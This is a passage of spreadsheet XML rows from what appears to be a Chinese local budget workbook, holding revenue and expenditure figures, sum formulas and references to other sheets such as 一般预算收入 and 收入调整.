        <v>0.63814756671899531</v>
      </c>
    </row>
    <row r="12" spans="1:25" ht="17.25" customHeight="1">
      <c r="A12" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B12" s="3">
        <f>一般预算收入!B11</f>
        <v>75</v>
      </c>
      <c r="C12" s="3">
        <f t="shared" si="5"/>
        <v>-15</v>
      </c>
      <c r="D12" s="3"/>
      <c r="E12" s="3">
        <f>一般预算收入!E11</f>
        <v>-15</v>
      </c>
      <c r="F12" s="3">
        <f t="shared" si="6"/>
        <v>60</v>
      </c>
      <c r="G12" s="3" t="s">
        <v>38</v>
      </c>
      <c r="H12" s="3">
        <v>69190</v>
      </c>
      <c r="I12" s="3">
        <f t="shared" si="3"/>
        <v>3897</v>
      </c>
      <c r="J12" s="3"/>
      <c r="K12" s="3"/>
      <c r="L12" s="3"/>
      <c r="M12" s="3"/>
      <c r="N12" s="3"/>
      <c r="O12" s="3"/>
      <c r="P12" s="3"/>
      <c r="Q12" s="3"/>
      <c r="R12" s="3"/>
      <c r="S12" s="3"/>
      <c r="T12" s="3"/>
      <c r="U12" s="3">
        <f>211+38</f>
        <v>249</v>
      </c>
      <c r="V12" s="3">
        <v>3648</v>
      </c>
      <c r="W12" s="3">
        <f t="shared" si="7"/>
        <v>73087</v>
      </c>
      <c r="X12" s="33">
        <v>56489</v>
      </c>
      <c r="Y12" s="33">
        <f t="shared" si="9"/>
        <v>0.77290078947008356</v>
      </c>
    </row>
    <row r="13" spans="1:25" ht="17.25" customHeight="1">
      <c r="A13" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B13" s="3">
        <f>一般预算收入!B12</f>
        <v>2800</v>
      </c>
      <c r="C13" s="3">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D13" s="3"/>
      <c r="E13" s="3">
        <f>一般预算收入!E12</f>
        <v>0</v>
      </c>
      <c r="F13" s="3">
        <f t="shared" si="6"/>
        <v>2800</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>40</v>
      </c>
      <c r="H13" s="3">
        <v>91881</v>
      </c>
      <c r="I13" s="3">
        <f t="shared" si="3"/>
        <v>3814</v>
      </c>
      <c r="J13" s="3"/>
      <c r="K13" s="3"/>
      <c r="L13" s="3"/>
      <c r="M13" s="3"/>
      <c r="N13" s="3"/>
      <c r="O13" s="3"/>
      <c r="P13" s="3"/>
      <c r="Q13" s="3"/>
      <c r="R13" s="3"/>
      <c r="S13" s="3"/>
      <c r="T13" s="3"/>
      <c r="U13" s="3">
        <f>2+127</f>
        <v>129</v>
      </c>
      <c r="V13" s="3">
        <v>3685</v>
      </c>
      <c r="W13" s="3">
        <f t="shared" si="7"/>
        <v>95695</v>
      </c>
      <c r="X13" s="33">
        <v>54638</v>
      </c>
      <c r="Y13" s="33">
        <f t="shared" si="9"/>
        <v>0.57095982026229164</v>
      </c>
    </row>
    <row r="14" spans="1:25" ht="17.25" customHeight="1">
      <c r="A14" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B14" s="3">
        <f>一般预算收入!B13</f>
        <v>2300</v>
      </c>
      <c r="C14" s="3">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D14" s="3"/>
      <c r="E14" s="3">
        <f>一般预算收入!E13</f>
        <v>0</v>
      </c>
      <c r="F14" s="3">
        <f t="shared" si="6"/>
        <v>2300</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>42</v>
      </c>
      <c r="H14" s="3">
        <v>14089</v>
      </c>
      <c r="I14" s="3">
        <f t="shared" si="3"/>
        <v>42403</v>
      </c>
      <c r="J14" s="3"/>
      <c r="K14" s="3"/>
      <c r="L14" s="3"/>
      <c r="M14" s="3"/>
      <c r="N14" s="3"/>
      <c r="O14" s="3">
        <v>15130</v>
      </c>
      <c r="P14" s="3"/>
      <c r="Q14" s="3"/>
      <c r="R14" s="3"/>
      <c r="S14" s="3"/>
      <c r="T14" s="3"/>
      <c r="U14" s="3">
        <f>21683+28-265</f>
        <v>21446</v>
      </c>
      <c r="V14" s="3">
        <v>5827</v>
      </c>
      <c r="W14" s="3">
        <f t="shared" si="7"/>
        <v>56492</v>
      </c>
      <c r="X14" s="33">
        <v>24242</v>
      </c>
      <c r="Y14" s="33">
        <f t="shared" si="9"/>
        <v>0.42912270764001981</v>
      </c>
    </row>
    <row r="15" spans="1:25" ht="17.25" customHeight="1">
      <c r="A15" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B15" s="3">
        <f>一般预算收入!B14</f>
        <v>900</v>
      </c>
      <c r="C15" s="3">
        <f t="shared" si="5"/>
        <v>50</v>
      </c>
      <c r="D15" s="3"/>
      <c r="E15" s="3">
        <f>一般预算收入!E14</f>
        <v>50</v>
      </c>
      <c r="F15" s="3">
        <f t="shared" si="6"/>
        <v>950</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>44</v>
      </c>
      <c r="H15" s="3">
        <v>15938</v>
      </c>
      <c r="I15" s="3">
        <f t="shared" si="3"/>
        <v>37567</v>
      </c>
      <c r="J15" s="3"/>
      <c r="K15" s="3"/>
      <c r="L15" s="3"/>
      <c r="M15" s="3"/>
      <c r="N15" s="3"/>
      <c r="O15" s="3">
        <v>15000</v>
      </c>
      <c r="P15" s="3"/>
      <c r="Q15" s="3"/>
      <c r="R15" s="3"/>
      <c r="S15" s="3"/>
      <c r="T15" s="3"/>
      <c r="U15" s="3">
        <f>157+84</f>
        <v>241</v>
      </c>
      <c r="V15" s="3">
        <f>24408+96+100-2278</f>
        <v>22326</v>
      </c>
      <c r="W15" s="3">
        <f t="shared" si="7"/>
        <v>53505</v>
      </c>
      <c r="X15" s="33">
        <v>33066</v>
      </c>
      <c r="Y15" s="33">
        <f t="shared" si="9"/>
        <v>0.61799831791421367</v>
      </c>
    </row>
    <row r="16" spans="1:25" ht="17.25" customHeight="1">
      <c r="A16" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B16" s="3">
        <f>一般预算收入!B15</f>
        <v>2310</v>
      </c>
      <c r="C16" s="3">
        <f t="shared" si="5"/>
        <v>700</v>
      </c>
      <c r="D16" s="3"/>
      <c r="E16" s="3">
        <f>一般预算收入!E15</f>
        <v>700</v>
      </c>
      <c r="F16" s="3">
        <f t="shared" si="6"/>
        <v>3010</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>46</v>
      </c>
      <c r="H16" s="3">
        <v>57757</v>
      </c>
      <c r="I16" s="3">
        <f t="shared" si="3"/>
        <v>21122</v>
      </c>
      <c r="J16" s="3"/>
      <c r="K16" s="3"/>
      <c r="L16" s="3"/>
      <c r="M16" s="3">
        <v>1676</v>
      </c>
      <c r="N16" s="3"/>
      <c r="O16" s="3"/>
      <c r="P16" s="3"/>
      <c r="Q16" s="3"/>
      <c r="R16" s="3"/>
      <c r="S16" s="3"/>
      <c r="T16" s="3"/>
      <c r="U16" s="3">
        <f>6042+489</f>
        <v>6531</v>
      </c>
      <c r="V16" s="3">
        <f>12302+440+38+24+94+39-10-12</f>
        <v>12915</v>
      </c>
      <c r="W16" s="3">
        <f t="shared" si="7"/>
        <v>78879</v>
      </c>
      <c r="X16" s="33">
        <v>45553</v>
      </c>
      <c r="Y16" s="33">
        <f t="shared" si="9"/>
        <v>0.57750478581117914</v>
      </c>
    </row>
    <row r="17" spans="1:25" ht="17.25" customHeight="1">
      <c r="A17" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B17" s="3">
        <f>一般预算收入!B16</f>
        <v>12000</v>
      </c>
      <c r="C17" s="3">
        <f t="shared" si="5"/>
        <v>-3300</v>
      </c>
      <c r="D17" s="3"/>
      <c r="E17" s="3">
        <f>一般预算收入!E16</f>
        <v>-3300</v>
      </c>
      <c r="F17" s="3">
        <f t="shared" si="6"/>
        <v>8700</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>48</v>
      </c>
      <c r="H17" s="3">
        <v>13783</v>
      </c>
      <c r="I17" s="3">
        <f t="shared" si="3"/>
        <v>3430</v>
      </c>
      <c r="J17" s="3"/>
      <c r="K17" s="3"/>
      <c r="L17" s="3"/>
      <c r="M17" s="3"/>
      <c r="N17" s="3"/>
      <c r="O17" s="3"/>
      <c r="P17" s="3"/>
      <c r="Q17" s="3"/>
      <c r="R17" s="3"/>
      <c r="S17" s="3"/>
      <c r="T17" s="3"/>
      <c r="U17" s="3">
        <f>157+75</f>
        <v>232</v>
      </c>
      <c r="V17" s="3">
        <f>3193+5</f>
        <v>3198</v>
      </c>
      <c r="W17" s="3">
        <f t="shared" si="7"/>
        <v>17213</v>
      </c>
      <c r="X17" s="33">
        <v>12061</v>
      </c>
      <c r="Y17" s="33">
        <f t="shared" si="9"/>
        <v>0.70069133794225291</v>
      </c>
    </row>
    <row r="18" spans="1:25" ht="17.25" customHeight="1">
      <c r="A18" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B18" s="3">
        <f>一般预算收入!B17</f>
        <v>700</v>
      </c>
      <c r="C18" s="3">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D18" s="3"/>
      <c r="E18" s="3">
        <f>一般预算收入!E17</f>
        <v>0</v>
      </c>
      <c r="F18" s="3">
        <f t="shared" si="6"/>
        <v>700</v>
      </c>
      <c r="G18" s="3" t="s">
        <v>50</v>
      </c>
      <c r="H18" s="3">
        <v>4640</v>
      </c>
      <c r="I18" s="3">
        <f t="shared" si="3"/>
        <v>2016</v>
      </c>
      <c r="J18" s="3"/>
      <c r="K18" s="3"/>
      <c r="L18" s="3"/>
      <c r="M18" s="3"/>
      <c r="N18" s="3"/>
      <c r="O18" s="3"/>
      <c r="P18" s="3"/>
      <c r="Q18" s="3"/>
      <c r="R18" s="3"/>
      <c r="S18" s="3"/>
      <c r="T18" s="3"/>
      <c r="U18" s="3">
        <f>1952-1642</f>
        <v>310</v>
      </c>
      <c r="V18" s="3">
        <v>1706</v>
      </c>
      <c r="W18" s="3">
        <f t="shared" si="7"/>
        <v>6656</v>
      </c>
      <c r="X18" s="33">
        <v>12863</v>
      </c>
      <c r="Y18" s="33">
        <f t="shared" si="9"/>
        <v>1.9325420673076923</v>
      </c>
    </row>
    <row r="19" spans="1:25" ht="17.25" customHeight="1">
      <c r="A19" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B19" s="3">
        <f>一般预算收入!B18</f>
        <v>2600</v>
      </c>
      <c r="C19" s="3">
        <f t="shared" si="5"/>
        <v>-150</v>
      </c>
      <c r="D19" s="3"/>
      <c r="E19" s="3">
        <f>一般预算收入!E18</f>
        <v>-150</v>
      </c>
      <c r="F19" s="3">
        <f t="shared" si="6"/>
        <v>2450</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>52</v>
      </c>
      <c r="H19" s="3">
        <v>1496</v>
      </c>
      <c r="I19" s="3">
        <f t="shared" si="3"/>
        <v>1813</v>
      </c>
      <c r="J19" s="3"/>
      <c r="K19" s="3"/>
      <c r="L19" s="3"/>
      <c r="M19" s="3"/>
      <c r="N19" s="3"/>
      <c r="O19" s="3"/>
      <c r="P19" s="3"/>
      <c r="Q19" s="3"/>
      <c r="R19" s="3"/>
      <c r="S19" s="3"/>
      <c r="T19" s="3"/>
      <c r="U19" s="3">
        <v>83</v>
      </c>
      <c r="V19" s="3">
        <v>1730</v>
      </c>
      <c r="W19" s="3">
        <f t="shared" si="7"/>
        <v>3309</v>
      </c>
      <c r="X19" s="33">
        <v>1735</v>
      </c>
      <c r="Y19" s="33">
        <f t="shared" si="9"/>
        <v>0.52432759141734664</v>
      </c>
    </row>
    <row r="20" spans="1:25" ht="17.25" customHeight="1">
      <c r="A20" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B20" s="3">
        <f>一般预算收入!B19</f>
        <v>8700</v>
      </c>
      <c r="C20" s="3">
        <f t="shared" si="5"/>
        <v>-5700</v>
      </c>
      <c r="D20" s="3"/>
      <c r="E20" s="3">
        <f>一般预算收入!E19</f>
        <v>-5700</v>
      </c>
      <c r="F20" s="3">
        <f t="shared" si="6"/>
        <v>3000</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>54</v>
      </c>
      <c r="H20" s="3"/>
      <c r="I20" s="3">
        <f t="shared" si="3"/>
        <v>50</v>
      </c>
      <c r="J20" s="3"/>
      <c r="K20" s="3"/>
      <c r="L20" s="3"/>
      <c r="M20" s="3"/>
      <c r="N20" s="3"/>
      <c r="O20" s="3"/>
      <c r="P20" s="3"/>
      <c r="Q20" s="3"/>
      <c r="R20" s="3"/>
      <c r="S20" s="3"/>
      <c r="T20" s="3"/>
      <c r="U20" s="3"/>
      <c r="V20" s="3">
        <v>50</v>
      </c>
      <c r="W20" s="3">
        <f t="shared" si="7"/>
        <v>50</v>
      </c>
    </row>
    <row r="21" spans="1:25" ht="17.25" customHeight="1">
      <c r="A21" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B21" s="3">
        <f>一般预算收入!B20</f>
        <v>18500</v>
      </c>
      <c r="C21" s="3">
        <f t="shared" si="5"/>
        <v>-10544</v>
      </c>
      <c r="D21" s="3"/>
      <c r="E21" s="3">
        <f>一般预算收入!E20</f>
        <v>-10544</v>
      </c>
      <c r="F21" s="3">
        <f t="shared" si="6"/>
        <v>7956</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>56</v>
      </c>
      <c r="H21" s="3"/>
      <c r="I21" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J21" s="3"/>
      <c r="K21" s="3"/>
      <c r="L21" s="3"/>
      <c r="M21" s="3"/>
      <c r="N21" s="3"/>
      <c r="O21" s="3"/>
      <c r="P21" s="3"/>
      <c r="Q21" s="3"/>
      <c r="R21" s="3"/>
      <c r="S21" s="3"/>
      <c r="T21" s="3"/>
      <c r="U21" s="3"/>
      <c r="V21" s="3"/>
      <c r="W21" s="3">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:25" s="32" customFormat="1" ht="17.25" customHeight="1">
      <c r="A22" s="5" t="s">
        <v>57</v>
      </c>
      <c r="B22" s="5">
        <f t="shared" ref="B22" si="10">SUM(B23:B27)</f>
        <v>56248</v>
      </c>
      <c r="C22" s="5">
        <f>SUM(C23:C27)</f>
        <v>9666</v>
      </c>
      <c r="D22" s="5">
        <f>SUM(D23:D27)</f>
        <v>0</v>
      </c>
      <c r="E22" s="5">
        <f>SUM(E23:E27)</f>
        <v>9666</v>
      </c>
      <c r="F22" s="5">
        <f>SUM(F23:F27)</f>
        <v>65914</v>
      </c>
      <c r="G22" s="30" t="s">
        <v>58</v>
      </c>
      <c r="H22" s="30">
        <v>7106</v>
      </c>
      <c r="I22" s="30">
        <f t="shared" si="3"/>
        <v>3247</v>
      </c>
      <c r="J22" s="30"/>
      <c r="K22" s="30"/>
      <c r="L22" s="30"/>
      <c r="M22" s="30"/>
      <c r="N22" s="30"/>
      <c r="O22" s="30"/>
      <c r="P22" s="30"/>
      <c r="Q22" s="30"/>
      <c r="R22" s="30"/>
      <c r="S22" s="30"/>
      <c r="T22" s="30"/>
      <c r="U22" s="30">
        <f>2802</f>
        <v>2802</v>
      </c>
      <c r="V22" s="30">
        <f>2945-2500</f>
        <v>445</v>
      </c>
      <c r="W22" s="30">
        <f t="shared" si="7"/>
        <v>10353</v>
      </c>
      <c r="X22" s="32">
        <v>6070</v>
      </c>
      <c r="Y22" s="32">
        <f t="shared" ref="Y22" si="11">X22/W22</f>
        <v>0.58630348691200618</v>
      </c>
    </row>
    <row r="23" spans="1:25" ht="17.25" customHeight="1">
      <c r="A23" s="3" t="s">
        <v>59</v>
      </c>
      <c r="B23" s="3">
        <f>一般预算收入!B22</f>
        <v>5410</v>
      </c>
      <c r="C23" s="3">
        <f t="shared" ref="C23" si="12">SUM(D23:E23)</f>
        <v>1014</v>
      </c>
      <c r="D23" s="3"/>
      <c r="E23" s="3">
        <f>一般预算收入!E22</f>
        <v>1014</v>
      </c>
      <c r="F23" s="3">
        <f t="shared" ref="F23" si="13">B23+C23</f>
        <v>6424</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>60</v>
      </c>
      <c r="H23" s="3">
        <v>11061</v>
      </c>
      <c r="I23" s="3">
        <f t="shared" si="3"/>
        <v>1025</v>
      </c>
      <c r="J23" s="3"/>
      <c r="K23" s="3"/>
      <c r="L23" s="3"/>
      <c r="M23" s="3"/>
      <c r="N23" s="3"/>
      <c r="O23" s="3"/>
      <c r="P23" s="3"/>
      <c r="Q23" s="3"/>
      <c r="R23" s="3"/>
      <c r="S23" s="3"/>
      <c r="T23" s="3"/>
      <c r="U23" s="3"/>
      <c r="V23" s="3">
        <f>1025</f>
        <v>1025</v>
      </c>
      <c r="W23" s="3">
        <f t="shared" si="7"/>
        <v>12086</v>
      </c>
      <c r="X23" s="33">
        <v>20711</v>
      </c>
      <c r="Y23" s="33">
        <f t="shared" ref="Y23:Y28" si="14">X23/W23</f>
        <v>1.7136356114512659</v>
      </c>
    </row>
    <row r="24" spans="1:25" ht="17.25" customHeight="1">
      <c r="A24" s="3" t="s">
        <v>61</v>
      </c>
      <c r="B24" s="3">
        <f>一般预算收入!B35</f>
        <v>39400</v>
      </c>
      <c r="C24" s="3">
        <f>SUM(D24:E24)</f>
        <v>2400</v>
      </c>
      <c r="D24" s="3"/>
      <c r="E24" s="3">
        <f>收入调整!F41</f>
        <v>2400</v>
      </c>
      <c r="F24" s="3">
        <f>B24+C24</f>
        <v>41800</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>62</v>
      </c>
      <c r="H24" s="3">
        <v>1474</v>
      </c>
      <c r="I24" s="3">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
      <c r="J24" s="3"/>
      <c r="K24" s="3"/>
      <c r="L24" s="3"/>
      <c r="M24" s="3"/>
      <c r="N24" s="3"/>
      <c r="O24" s="3"/>
      <c r="P24" s="3"/>
      <c r="Q24" s="3"/>
      <c r="R24" s="3"/>
      <c r="S24" s="3"/>
      <c r="T24" s="3"/>
      <c r="U24" s="3"/>
      <c r="V24" s="3">
        <v>10</v>
      </c>
      <c r="W24" s="3">
        <f t="shared" si="7"/>
        <v>1484</v>
      </c>
      <c r="X24" s="33">
        <v>434</v>
      </c>
      <c r="Y24" s="33">
        <f t="shared" si="14"/>
        <v>0.29245283018867924</v>
      </c>
    </row>
    <row r="25" spans="1:25" ht="17.25" customHeight="1">
      <c r="A25" s="3" t="s">
        <v>63</v>
      </c>
      <c r="B25" s="3">
        <f>一般预算收入!B36</f>
        <v>6000</v>
      </c>
      <c r="C25" s="3">
        <f>SUM(D25:E25)</f>
        <v>3600</v>
      </c>
      <c r="D25" s="3"/>
      <c r="E25" s="3">
        <f>收入调整!F42</f>
        <v>3600</v>
      </c>
      <c r="F25" s="3">
        <f>B25+C25</f>
        <v>9600</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>64</v>
      </c>
      <c r="H25" s="3">
        <v>2000</v>
      </c>
      <c r="I25" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J25" s="3"/>
      <c r="K25" s="3"/>
      <c r="L25" s="3"/>
      <c r="M25" s="3"/>
      <c r="N25" s="3"/>
      <c r="O25" s="3"/>
      <c r="P25" s="3"/>
      <c r="Q25" s="3"/>
      <c r="R25" s="3"/>
      <c r="S25" s="3"/>
      <c r="T25" s="3"/>
      <c r="U25" s="3"/>
      <c r="V25" s="3"/>
      <c r="W25" s="3">
        <f t="shared" si="7"/>
        <v>2000</v>
      </c>
      <c r="Y25" s="33">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:25" ht="17.25" customHeight="1">
      <c r="A26" s="3" t="s">
        <v>65</v>
      </c>
      <c r="B26" s="3">
        <f>一般预算收入!B37</f>
        <v>5438</v>
      </c>
      <c r="C26" s="3">
        <f>SUM(D26:E26)</f>
        <v>300</v>
      </c>
      <c r="D26" s="3"/>
      <c r="E26" s="3">
        <f>收入调整!F43</f>
        <v>300</v>
      </c>
      <c r="F26" s="3">
        <f>B26+C26</f>
        <v>5738</v>
      </c>
      <c r="G26" s="3" t="s">
        <v>66</v>
      </c>
      <c r="H26" s="3">
        <v>1000</v>
      </c>
      <c r="I26" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="J26" s="3"/>
      <c r="K26" s="3"/>
      <c r="L26" s="3"/>
      <c r="M26" s="3"/>
      <c r="N26" s="3"/>
      <c r="O26" s="3"/>
      <c r="P26" s="3"/>
      <c r="Q26" s="3"/>
      <c r="R26" s="3"/>
      <c r="S26" s="3"/>
      <c r="T26" s="3"/>
      <c r="U26" s="3"/>
      <c r="V26" s="3"/>
      <c r="W26" s="3">
        <f t="shared" si="7"/>
        <v>1000</v>
      </c>
      <c r="X26" s="33">
        <v>1031</v>
      </c>
      <c r="Y26" s="33">
        <f t="shared" si="14"/>
        <v>1.0309999999999999</v>
      </c>
    </row>
    <row r="27" spans="1:25" ht="17.25" customHeight="1">
      <c r="A27" s="3" t="s">
        <v>67</v>
      </c>
      <c r="B27" s="3">
        <f>一般预算收入!B38</f>
        <v>0</v>
      </c>
      <c r="C27" s="3">
        <f>SUM(D27:E27)</f>
        <v>2352</v>
      </c>
      <c r="D27" s="3"/>
      <c r="E27" s="3">
        <f>收入调整!F44</f>
        <v>2352</v>
      </c>
      <c r="F27" s="3">
        <f>B27+C27</f>
        <v>2352</v>
      </c>
      <c r="G27" s="3" t="s">
        <v>68</v>
      </c>
      <c r="H27" s="3">
        <v>8000</v>
      </c>
      <c r="I27" s="3">
        <f t="shared" si="3"/>
        <v>7340</v>
      </c>
      <c r="J27" s="3"/>
      <c r="K27" s="3"/>
      <c r="L27" s="3"/>
      <c r="M27" s="3"/>
      <c r="N27" s="3"/>
      <c r="O27" s="3"/>
      <c r="P27" s="3"/>
      <c r="Q27" s="3"/>
      <c r="R27" s="3"/>
      <c r="S27" s="3"/>
      <c r="T27" s="3"/>
      <c r="U27" s="3"/>
      <c r="V27" s="3">
        <v>7340</v>
      </c>
      <c r="W27" s="3">
        <f t="shared" si="7"/>
        <v>15340</v>
      </c>
      <c r="X27" s="33">
        <v>1293</v>
      </c>
      <c r="Y27" s="33">
        <f t="shared" si="14"/>
        <v>8.4289439374185135E-2</v>
      </c>
    </row>
    <row r="28" spans="1:25" s="32" customFormat="1" ht="24" customHeight="1">
      <c r="A28" s="5" t="s">
        <v>69</v>
      </c>
      <c r="B28" s="5">
        <f t="shared" ref="B28" si="15">B5+B22</f>
        <v>132547.77499999999</v>
      </c>
      <c r="C28" s="5">
        <f>C5+C22</f>
        <v>-10294.450000000001</v>
      </c>
      <c r="D28" s="5">
        <f>D5+D22</f>
        <v>0</v>
      </c>
      <c r="E28" s="5">
        <f>E5+E22</f>
        <v>-10294.450000000001</v>
      </c>
      <c r="F28" s="5">
        <f>F5+F22</f>
        <v>122253.325</v>
      </c>
      <c r="G28" s="5" t="s">
        <v>70</v>
      </c>
      <c r="H28" s="5">
        <f>SUM(H5:H27)</f>
        <v>472323</v>
      </c>
      <c r="I28" s="5">
        <f t="shared" ref="I28" si="16">SUM(J28:V28)</f>
        <v>174915</v>
      </c>
      <c r="J28" s="5">
        <f t="shared" ref="J28" si="17">SUM(J5:J27)</f>
        <v>0</v>
      </c>
      <c r="K28" s="5">
        <f t="shared" ref="K28:X28" si="18">SUM(K5:K27)</f>
        <v>0</v>
      </c>
      <c r="L28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="M28" s="5">
        <f t="shared" si="18"/>
        <v>1676</v>
      </c>
      <c r="N28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="O28" s="5">
        <f t="shared" si="18"/>
        <v>31900</v>
      </c>
      <c r="P28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="Q28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="R28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="S28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="T28" s="5">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="U28" s="5">
        <f t="shared" si="18"/>
        <v>34756</v>
      </c>
      <c r="V28" s="5">
        <f t="shared" si="18"/>
        <v>106583</v>
      </c>
      <c r="W28" s="5">
        <f t="shared" si="18"/>
        <v>647238</v>
      </c>
      <c r="X28" s="32">
        <f t="shared" si="18"/>
        <v>392171</v>
      </c>
      <c r="Y28" s="32">
        <f t="shared" si="14"/>
        <v>0.60591467126466614</v>
      </c>
    </row>
    <row r="29" spans="1:25" s="32" customFormat="1" ht="18.75" customHeight="1">
      <c r="A29" s="5" t="s">
        <v>71</v>
      </c>
      <c r="B29" s="5">
        <f t="shared" ref="B29" si="19">B30+B35+B51</f>
        <v>283571</v>
      </c>
      <c r="C29" s="5">
        <f>C30+C35+C51</f>
        <v>18796</v>
      </c>
      <c r="D29" s="5">
        <f>D30+D35+D51</f>
        <v>0</v>
      </c>
      <c r="E29" s="5">
        <f>E30+E35+E51</f>
        <v>18796</v>
      </c>
      <c r="F29" s="5">
        <f>F30+F35+F51</f>
        <v>302367</v>
      </c>
      <c r="G29" s="5" t="s">
        <v>72</v>
      </c>
      <c r="H29" s="5">
        <f>SUM(H31:H38)</f>
        <v>3338</v>
      </c>
      <c r="I29" s="5">
        <f>SUM(J29:V29)</f>
        <v>0</v>
      </c>
      <c r="J29" s="5">
        <f t="shared" ref="J29" si="20">SUM(J31:J38)</f>
        <v>0</v>
      </c>
      <c r="K29" s="5">
        <f t="shared" ref="K29:W29" si="21">SUM(K31:K38)</f>
        <v>0</v>
      </c>
      <c r="L29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="M29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="N29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="O29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="P29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="Q29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="R29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="S29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="T29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="U29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="V29" s="5">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="W29" s="5">
        <f t="shared" si="21"/>
        <v>3338</v>
      </c>
    </row>
    <row r="30" spans="1:25" ht="15" customHeight="1">
      <c r="A30" s="30" t="s">
        <v>73</v>
      </c>
      <c r="B30" s="3">
        <f t="shared" ref="B30" si="22">SUM(B31:B34)</f>
        <v>7960</v>
      </c>
      <c r="C30" s="3">
        <f>SUM(C31:C34)</f>
        <v>0</v>
      </c>
      <c r="D30" s="3">
        <f>SUM(D31:D34)</f>
        <v>0</v>
      </c>
      <c r="E30" s="3">
        <f>SUM(E31:E34)</f>
        <v>0</v>
      </c>
      <c r="F30" s="3">
        <f>SUM(F31:F34)</f>
        <v>7960</v>
      </c>
      <c r="G30" s="3" t="s">
        <v>74</v>
      </c>
      <c r="H30" s="3"/>
      <c r="I30" s="3">
        <f>SUM(J30:V30)</f>
        <v>0</v>
      </c>
      <c r="J30" s="3"/>
      <c r="K30" s="3"/>
      <c r="L30" s="3"/>
      <c r="M30" s="3"/>
      <c r="N30" s="3"/>
      <c r="O30" s="3"/>
      <c r="P30" s="3"/>
      <c r="Q30" s="3"/>
      <c r="R30" s="3"/>
      <c r="S30" s="3"/>
      <c r="T30" s="3"/>
      <c r="U30" s="3"/>
      <c r="V30" s="3"/>
      <c r="W30" s="3">
        <f t="shared" ref="W30" si="23">H30+I30</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:25" ht="15" customHeight="1">
      <c r="A31" s="30" t="s">
        <v>75</v>
      </c>
      <c r="B31" s="3">
        <v>1822</v>
      </c>
      <c r="C31" s="3">
        <f t="shared" ref="C31" si="24">SUM(D31:E31)</f>
        <v>0</v>
      </c>
      <c r="D31" s="3"/>
      <c r="E31" s="3"/>
      <c r="F31" s="3">
        <f>B31+C31</f>
        <v>1822</v>
      </c>
      <c r="G31" s="3" t="s">
        <v>76</v>
      </c>
      <c r="H31" s="3">
        <v>30</v>
      </c>
      <c r="I31" s="3">
        <f>SUM(J31:V31)</f>
        <v>0</v>
      </c>
      <c r="J31" s="3"/>
      <c r="K31" s="3"/>
      <c r="L31" s="3"/>
      <c r="M31" s="3"/>
      <c r="N31" s="3"/>
      <c r="O31" s="3"/>
      <c r="P31" s="3"/>
      <c r="Q31" s="3"/>
      <c r="R31" s="3"/>
      <c r="S31" s="3"/>
      <c r="T31" s="3"/>
      <c r="U31" s="3"/>
      <c r="V31" s="3"/>
      <c r="W31" s="3">
        <f>H31+I31</f>
        <v>30</v>
      </c>
    </row>
    <row r="32" spans="1:25" ht="15" customHeight="1">
      <c r="A32" s="30" t="s">
        <v>77</v>
      </c>
      <c r="B32" s="3">
        <v>305</v>
      </c>
      <c r="C32" s="3">
        <f>SUM(D32:E32)</f>
        <v>0</v>
      </c>
      <c r="D32" s="3"/>
      <c r="E32" s="3"/>
      <c r="F32" s="3">
        <f t="shared" ref="F32" si="25">B32+C32</f>
        <v>305</v>
      </c>
      <c r="G32" s="3" t="s">
        <v>78</v>
      </c>
      <c r="H32" s="3">
        <v>1623</v>
      </c>
      <c r="I32" s="3">
        <f>SUM(J32:V32)</f>
        <v>0</v>
      </c>
      <c r="J32" s="3"/>
      <c r="K32" s="3"/>
      <c r="L32" s="3"/>
